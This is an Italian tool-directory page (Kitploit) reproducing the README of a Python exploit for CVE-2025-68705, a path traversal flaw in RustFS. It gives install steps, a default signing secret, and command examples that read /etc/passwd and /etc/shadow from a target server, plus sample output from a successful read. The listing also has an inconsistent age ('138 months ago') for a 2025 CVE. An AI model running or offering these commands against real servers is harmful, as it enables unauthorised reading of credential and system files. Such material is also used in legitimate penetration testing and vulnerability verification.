Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-68705 — Script Python di exploit per CVE-2025-68705, una vulnerabilità di path traversal in RustFS, che consente la lettura arbitraria di file e la verifica della vulnerabilità sui server target. | Kitploit
Strumenti/GitHubGitHub/imjdl/cve-2025-68705
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubimjdl/cve-2025-68705

CVE-2025-68705

Script Python di exploit per CVE-2025-68705, una vulnerabilità di path traversal in RustFS, che consente la lettura arbitraria di file e la verifica della vulnerabilità sui server target.

Vedi Repository
138 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-68705 - Exploit di Path Traversal in RustFS

Descrizione

Questo script sfrutta una vulnerabilità di path traversal (CVE-2025-68705) in RustFS che consente di leggere file arbitrari sul server.

Requisiti

  • Python 3.6+
  • Vedere requirements.txt per le dipendenze

Installazione

git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

Utilizzo

python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Argomenti obbligatori

ArgomentoDescrizione
-H, --hostIP o hostname del host target
-p, --portNumero di porta del target
-f, --filePercorso del file da leggere (opzionale con --check-only)

Argomenti opzionali

ArgomentoDescrizioneDefault
-s, --secretChiave segreta per la firmarustfsadmin
-o, --offsetOffset di lettura del file0
-l, --lengthNumero di byte da leggere4096
--check-onlyVerifica solo se il target è vulnerabile-

Esempi

Leggere il file /etc/passwd

python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

Leggere /etc/shadow con offset e lunghezza personalizzati

python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

Utilizzare una chiave segreta personalizzata

python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

Verificare solo se il target è vulnerabile

python exp.py -H 192.168.1.128 -p 9000 --check-only

Leggere un intervallo specifico del file

python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

Esempio di output

python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

Licenza

Questo progetto è concesso in licenza secondo i termini della MIT License - vedere il file LICENSE per i dettagli.

Riferimenti

  • Advisory di sicurezza di RustFS
  • CVE-2025-68705
Scarica lo strumento